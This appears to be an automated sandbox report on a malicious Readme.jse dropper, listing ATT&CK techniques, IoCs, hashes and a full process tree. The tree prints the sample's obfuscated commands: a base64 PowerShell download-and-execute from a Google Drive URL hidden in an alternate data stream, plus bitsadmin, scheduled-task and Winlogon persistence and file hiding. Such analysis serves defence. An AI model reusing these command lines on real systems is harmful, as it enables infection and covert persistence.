d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61

Resubmissions

06/09/2022, 20:05

220906-ytvx4aaaf2 10

06/09/2022, 20:01

220906-yrsd7afcgk 10

Analysis

max time kernel
101s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
06/09/2022, 20:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Readme.jse
Size

1KB
MD5

afbbf88c39646d17dcc0ce6383204b3b
SHA1

cd3a92e79faa4e1e9011ac21fa6beeb285657993
SHA256

d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61
SHA512

e500ad5231b81b5ae5a92db03db8fe87c67299b7865b3f36293c98bb46614d17f3e11e712023d6fa06812c4717174f96db17ff36c2c8b2160ce71fe2b8909574

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?id=1iktVtJAbuAyKtOK0xSpQJnmm88EicL4d&export=download

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\ProgramData\\Jreathtaking\\svchost\""	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	1580	powershell.exe
18	1580	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
4972	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3144	schtasks.exe
4264	schtasks.exe

Download via BitsAdmin 1 TTPs 3 IoCs

dropper

BITS Jobs

T1197

pid	Process
1284	bitsadmin.exe
2052	bitsadmin.exe
1408	bitsadmin.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalH6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1436	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
5084	powershell.exe
5084	powershell.exe
4216	powershell.exe
4216	powershell.exe
5084	powershell.exe
4216	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 1488 wrote to memory of 4648	1488	WScript.exe	85
PID 1488 wrote to memory of 4648	1488	WScript.exe	85
PID 4648 wrote to memory of 4804	4648	cmd.exe	87
PID 4648 wrote to memory of 4804	4648	cmd.exe	87
PID 4648 wrote to memory of 1776	4648	cmd.exe	88
PID 4648 wrote to memory of 1776	4648	cmd.exe	88
PID 1776 wrote to memory of 1580	1776	cmd.exe	89
PID 1776 wrote to memory of 1580	1776	cmd.exe	89
PID 1580 wrote to memory of 204	1580	powershell.exe	90
PID 1580 wrote to memory of 204	1580	powershell.exe	90
PID 204 wrote to memory of 2152	204	csc.exe	91
PID 204 wrote to memory of 2152	204	csc.exe	91
PID 1580 wrote to memory of 3200	1580	powershell.exe	93
PID 1580 wrote to memory of 3200	1580	powershell.exe	93
PID 1580 wrote to memory of 4348	1580	powershell.exe	95
PID 1580 wrote to memory of 4348	1580	powershell.exe	95
PID 4348 wrote to memory of 3504	4348	cmd.exe	96
PID 4348 wrote to memory of 3504	4348	cmd.exe	96
PID 3504 wrote to memory of 4292	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	103
PID 3504 wrote to memory of 4292	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	103
PID 3504 wrote to memory of 4152	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	106
PID 3504 wrote to memory of 4152	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	106
PID 3504 wrote to memory of 3284	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	104
PID 3504 wrote to memory of 3284	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	104
PID 3504 wrote to memory of 3168	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	109
PID 3504 wrote to memory of 3168	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	109
PID 3168 wrote to memory of 1284	3168	cmd.exe	111
PID 3168 wrote to memory of 1284	3168	cmd.exe	111
PID 3504 wrote to memory of 1520	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	112
PID 3504 wrote to memory of 1520	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	112
PID 1520 wrote to memory of 2052	1520	cmd.exe	114
PID 1520 wrote to memory of 2052	1520	cmd.exe	114
PID 3504 wrote to memory of 312	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	115
PID 3504 wrote to memory of 312	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	115
PID 3504 wrote to memory of 4804	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	118
PID 3504 wrote to memory of 4804	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	118
PID 3504 wrote to memory of 940	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	119
PID 3504 wrote to memory of 940	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	119
PID 3504 wrote to memory of 1568	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	121
PID 3504 wrote to memory of 1568	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	121
PID 3504 wrote to memory of 4584	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	123
PID 3504 wrote to memory of 4584	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	123
PID 4584 wrote to memory of 5084	4584	cmd.exe	125
PID 4584 wrote to memory of 5084	4584	cmd.exe	125
PID 940 wrote to memory of 1408	940	cmd.exe	126
PID 940 wrote to memory of 1408	940	cmd.exe	126
PID 1568 wrote to memory of 4216	1568	cmd.exe	127
PID 1568 wrote to memory of 4216	1568	cmd.exe	127
PID 4216 wrote to memory of 3144	4216	powershell.exe	128
PID 4216 wrote to memory of 3144	4216	powershell.exe	128
PID 5084 wrote to memory of 4264	5084	powershell.exe	129
PID 5084 wrote to memory of 4264	5084	powershell.exe	129
PID 3504 wrote to memory of 4620	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	131
PID 3504 wrote to memory of 4620	3504	w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3	131
PID 4620 wrote to memory of 4972	4620	cmd.exe	133
PID 4620 wrote to memory of 4972	4620	cmd.exe	133
PID 4620 wrote to memory of 1436	4620	cmd.exe	134
PID 4620 wrote to memory of 1436	4620	cmd.exe	134

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4972	attrib.exe

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Readme.jse"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" CMD.eXE /c cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA= > %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg & CMd - < %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg
  2⤵
  - NTFS ADS
  - Suspicious use of WriteProcessMemory
  PID:4648
- - C:\Windows\system32\cmd.exe
    cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    CMd -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1580
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qlvmkjbj\qlvmkjbj.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:204
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78CE.tmp" "c:\Users\Admin\AppData\Local\Temp\qlvmkjbj\CSCC4925EC47F8748E0849384A504A5997.TMP"
        6⤵
        
        PID:2152
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cOpy /b %LOCALAPPDATA%\23sBebmrIp3ktbW1Q4A5l50lSj56P0W0n2E375juzHRc6qMmq1MCRdJdaVJXSbDL.jpg + %LOCALAPPDATA%\DRy8q3cz8Qy7C9RCUj6Fgfl8cl50T0J1wXa763SSG9JOd7c3Hw6T56Tv4p3zg80m.avi %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        
        PID:3200
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4348
      - C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        
        C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3504
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Gttitude\
        7⤵
        
        PID:4292
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\%APPDATA%\"Adobe\Sissing\DriverFoundation..\
        7⤵
        
        PID:3284
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Kivorno\HNExperience..\
        7⤵
        
        PID:4152
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" "C:\ProgramData\Kivorno\HNExperience..\\explorer"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3168
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" "C:\ProgramData\Kivorno\HNExperience..\\explorer"
        8⤵
        Download via BitsAdmin
        
        PID:1284
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" %APPDATA%\\"Adobe\Sissing\DriverFoundation..\\conhost"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1520
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\Gttitude\\notepad.exe" C:\Users\Admin\AppData\Roaming\\"Adobe\Sissing\DriverFoundation..\\conhost"
        8⤵
        Download via BitsAdmin
        
        PID:2052
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\"C:\ProgramData\Jreathtaking\
        7⤵
        
        PID:312
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c md \\?\%APPDATA%\"Microsoft\Vscan\RacEngn..\
        7⤵
        
        PID:4804
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c bitsadmin /transfer /download /priority high "C:\ProgramData\Jreathtaking\\svchost" %APPDATA%\\"Microsoft\Vscan\RacEngn..\\mspaint"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:940
        
        C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer /download /priority high "C:\ProgramData\Jreathtaking\\svchost" C:\Users\Admin\AppData\Roaming\\"Microsoft\Vscan\RacEngn..\\mspaint"
        8⤵
        Download via BitsAdmin
        
        PID:1408
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Iulticulturald" /tr C:\Users\Admin\AppData\Roaming\Adobe\Sissing\DriverFoundation..\\conhost
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Iulticulturald" /tr C:\Users\Admin\AppData\Roaming\Adobe\Sissing\DriverFoundation..\\conhost
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4216
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc minute /mo 60 /tn Iulticulturald /tr C:\Users\Admin\AppData\Roaming\Adobe\Sissing\DriverFoundation..\\conhost
        9⤵
        Creates scheduled task(s)
        
        PID:3144
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Feathtaking" /tr C:\Users\Admin\AppData\Roaming\Microsoft\Vscan\RacEngn..\\mspaint
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn "Feathtaking" /tr C:\Users\Admin\AppData\Roaming\Microsoft\Vscan\RacEngn..\\mspaint
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5084
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc minute /mo 60 /tn Feathtaking /tr C:\Users\Admin\AppData\Roaming\Microsoft\Vscan\RacEngn..\\mspaint
        9⤵
        Creates scheduled task(s)
        
        PID:4264
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c attrib +s +h "Adobe\Sissing\DriverFoundation..\\conhost" & ping 1.1.1.1 -n 1 -w & del "C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4620
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "Adobe\Sissing\DriverFoundation..\\conhost"
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4972
        
        C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w
        8⤵
        Runs ping.exe
        
        PID:1436

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

BITS Jobs

T1197

Hidden Files and Directories

T1158

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

BITS Jobs

T1197

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\23sBebmrIp3ktbW1Q4A5l50lSj56P0W0n2E375juzHRc6qMmq1MCRdJdaVJXSbDL.jpg

Filesize
1.4MB

MD5
86afab8638b9944d5051197561a63548

SHA1
0fd28cf5ecbb0fefc5167f7163a974258e0fe69a

SHA256
acc1d8ed930ba7ef609673ea98523bfb3d863f6ee1e545d50e2e0ee77a914b1e

SHA512
f0878f7a7eb949ef2db461450cf891f8f02fd5a52460c984ef99689baeb340b347d7e54ea75d1fc8fa27a753f1076a640140778451d0d91e0a65cc7fe3a01fff

Download Submit
C:\Users\Admin\AppData\Local\DRy8q3cz8Qy7C9RCUj6Fgfl8cl50T0J1wXa763SSG9JOd7c3Hw6T56Tv4p3zg80m.avi

Filesize
80KB

MD5
bf4a0d10219ea1c16772c64122ec3653

SHA1
5830c87fe23cd28ad73781238e85aa896c5cc72e

SHA256
829466f9dd958e0b17d76721137e17ee4d0ddbbc3647aeacae53f88b37f4e394

SHA512
e261d3ddbef9b20690097833c1e14aa8b4249e7d8caf18aa41c9b9f447da8b8aaaf49bca22db5aa706b8d560cbea7b696628a024899a2eb0b207d5aa16ec3a67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES78CE.tmp

Filesize
1KB

MD5
5cef23d3afb0da91a8e9a0a3a065dbd0

SHA1
0529f675a50f64196110cae77e6a89e713aed369

SHA256
fcdcffbfb02acfb85b04da5104fc6258261a27bf0801810ec8655d9178ed4b2d

SHA512
b670431a19655f9078f9b3aee9dff9a63726312a68e86036c4bbafb472a5aac7f04be808c17bc6f9826927a268422d975ea7f13abd4d30d42059f1d2ee229b64

Download Submit
C:\Users\Admin\AppData\Local\Temp\qlvmkjbj\qlvmkjbj.dll

Filesize
3KB

MD5
5d89693442965224d81c6384b81f37a0

SHA1
5cc3a44c1d8cd469a38cdec6a55d572974722b70

SHA256
74be02b29ba844603eb8f69b5935f1dc601d8638f6488a3d2f37d20c59869aef

SHA512
f1893613975a0cdf3ac3a0dd31c6d1772e08e4c7cb945522a6a2a4441502c72f18dccb91af2cff9decaa65af14b4b6462bdfac0da2c0acdf9d1b5d46d1dc55aa

Download Submit
C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Filesize
1.5MB

MD5
45676d292dac6666fe36416bc2509876

SHA1
96d645b672994394cac81d593f84e1976d3deb1f

SHA256
6a5af3183b948688db3797355c554ffc45c66ba7a32fdd343e8ca2b4f3416be4

SHA512
70acc8ea094552ea6539b95b79502774ca11502db21edde2a4f5b1d0b1d6509a30dc0ce3ad2db1b70df8d98f67f449a0727fca949f9963cdb513876246f4c4ad

Download Submit
C:\Users\Admin\AppData\Local\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3

Filesize
1.5MB

MD5
45676d292dac6666fe36416bc2509876

SHA1
96d645b672994394cac81d593f84e1976d3deb1f

SHA256
6a5af3183b948688db3797355c554ffc45c66ba7a32fdd343e8ca2b4f3416be4

SHA512
70acc8ea094552ea6539b95b79502774ca11502db21edde2a4f5b1d0b1d6509a30dc0ce3ad2db1b70df8d98f67f449a0727fca949f9963cdb513876246f4c4ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qlvmkjbj\CSCC4925EC47F8748E0849384A504A5997.TMP

Filesize
652B

MD5
842681486fae739072476e49eb9c6e7d

SHA1
53c0381249cc13b3a94fd2c11cefadf49268dc42

SHA256
b1430648d821cb60fe4d5b721aaabdcb6a2e657aefaca8dc0da66568ef5c9e67

SHA512
94ffb5cb6d11c4016f28ab365db32a97dc8cd51bdcc45dc5a2b080593605ca069f9d42f863f653d7a81c1584f1dc0a45d085d78a4040c588c96bc0cfba72ef1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qlvmkjbj\qlvmkjbj.0.cs

Filesize
341B

MD5
1580ef4b9aa250d3a7839cb96f827b83

SHA1
5d1c458e697efb38e1ec19191ae753d83459df9a

SHA256
11f5a76d49f0609436736cbbd99fb416d507e78a3376a162bb8912f62ce3bab7

SHA512
8f63c8e1e68b66181f304015cc578ed4b058294f8c39c21d8638ebcd06b8946887d67af2dc96324fd1c2365d52ba65d417c82686c36ce0e0c0afcd688e840e2e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qlvmkjbj\qlvmkjbj.cmdline

Filesize
369B

MD5
3c4a72dff7251d8324d6b919ddadf0d8

SHA1
8d93a02a746e3f762eee75d2f175ad89441e1fb7

SHA256
903b0c8ea7d7076fdab5016f282517390d7f0ff087d90cc97345b07243180be4

SHA512
ca6194ca336564c032dceefcd0082c438b1a48276c8922d3a6bbad45ea116f9f8705500f3a12636193e325f9ce0a28a4fb9ef5147de9453c9eabcd951822eadb

Download Submit
memory/1580-154-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/1580-181-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/1580-136-0x000001B856AA0000-0x000001B856AC2000-memory.dmp

Filesize
136KB

Download
memory/1580-137-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/3504-178-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/3504-152-0x0000000000B60000-0x0000000000CD6000-memory.dmp

Filesize
1.5MB

Download
memory/3504-155-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/3504-153-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/4216-183-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/4216-173-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/5084-176-0x000001E95FE00000-0x000001E95FE76000-memory.dmp

Filesize
472KB

Download
memory/5084-171-0x000001E95FD30000-0x000001E95FD74000-memory.dmp

Filesize
272KB

Download
memory/5084-172-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download
memory/5084-182-0x00007FFF7B390000-0x00007FFF7BE51000-memory.dmp

Filesize
10.8MB

Download